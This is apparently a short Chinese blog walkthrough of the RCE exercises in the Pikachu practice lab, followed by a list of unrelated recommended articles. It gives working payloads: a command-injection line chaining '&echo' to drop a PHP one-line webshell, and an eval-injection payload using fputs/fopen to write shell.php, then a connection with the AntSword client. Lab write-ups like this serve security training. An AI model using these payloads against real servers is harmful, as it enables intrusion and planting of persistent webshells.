Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
_Emma_10 分钟前
【Linux media】Linux Media Driver Framework
linux·服务器·视频
星幻元宇VR14 分钟前
VR科普学习一体机|让知识触手可及的沉浸式科普新方式
科技·学习·安全·生活·vr
A_QXBlms23 分钟前
企业微信客户管理自动化:利用API同步客户标签与画像
运维·自动化·企业微信
如来神掌十八式26 分钟前
nginx基础知识
运维·nginx
网络点点滴30 分钟前
创建一个简单的web服务器
运维·服务器·前端
萝卜小白36 分钟前
算法实习学习记录-day01
linux·服务器
私人珍藏库40 分钟前
【Android】Operit AI v1.10.0+11 豆包ai手机开源版 自动化手机
运维·自动化
奋斗的小青年I1 小时前
紧急通知:所有基于文件的 Citrix 许可方式将于 2026 年 4 月 15 日停止运行
服务器·云桌面·vpx·citrix·netscaler
浮槎来1 小时前
光伏组件的PID学习
运维·学习·硬件工程·光伏
热爱专研AI的学妹1 小时前
DataEyes API:一站式大模型聚合网关,600 + 模型统一调用与负载均衡实战方案
运维·负载均衡